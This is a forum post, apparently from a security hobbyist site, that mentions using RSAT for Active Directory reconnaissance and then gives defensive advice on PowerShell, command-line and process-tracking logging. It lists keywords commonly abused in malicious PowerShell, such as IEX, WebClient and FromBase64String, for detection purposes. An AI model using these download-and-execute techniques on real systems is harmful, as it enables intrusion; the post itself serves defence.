PowerShell Remote Control

Asphyxia

Server Monkey
Administrator
Joined
Apr 25, 2015
Messages
1,212
Points
252
Age
26
Location
North America
Remember games where you could set "ghost", "ammo 9999", and "god"?

Walk through the walls, never die, and infinite ammo!?

Let's do that with Windows 10!

Go get RSAT and install.

Restart your machine and play with computers and users.

More coming soon, this is a work-in-progress. There are ways to recon AD (Active Directory) using Linux.

Want strong defense? Turn up logging - especially for Command Line, PowerShell, and WMI. Are you going to do full PCAP or NetFlow? Don't DoS your logging capabilities by turning up logging too hardcore. Actually, never go too hard.

Antivirus does not measure causality. Turn on process tracking, then enable Command Line auditing. If someone drops through PowerShell or Command Prompt - every line will be pulled. DO NOT turn on Process Tracking through AN entire deployment, only use on systems where there is CONFIRMED/LIKELY malicious activity and you have event log forwarding setup to handle the heavy blasting of logs. Sysmon is an alternative but still needs to be tuned. Endpoint detection and response (EDR) is beneficial to help alert on and allow one to take care of possible attacks quickly.

You have to turn on the PowerShell auditing feature (group policy). Commonly abused keywords: "download, IEX, powershell -version, start-process, invoke-expression, http, bitstransfer, WebClient, FromBase64String, rundll32".. any encoding and obfuscation is also dangerous.

Take any obfuscated PowerShell scripts, toss inside of https://gchq.github.io/CyberChef/ and you may have a very happy day.
 
Last edited:

Top